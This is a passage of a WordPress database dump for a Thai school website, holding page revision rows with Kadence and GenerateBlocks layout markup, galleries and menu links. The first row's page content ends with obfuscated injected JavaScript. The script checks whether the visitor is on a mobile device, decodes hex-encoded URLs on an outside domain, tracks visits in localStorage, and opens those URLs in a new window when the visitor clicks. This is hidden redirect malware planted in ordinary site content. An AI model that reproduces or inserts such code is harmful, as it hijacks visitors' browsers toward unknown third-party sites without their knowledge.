u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-08 21:43:28','2024-08-08 14:43:28','',14,'http://pakhaeng.ssk.in.th/?p=763',0,'revision','',0),
(765,1,'2024-08-08 21:44:15','2024-08-08 14:44:15','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":757,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/1-1.png\" alt=\"\" class=\"wp-image-757\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a 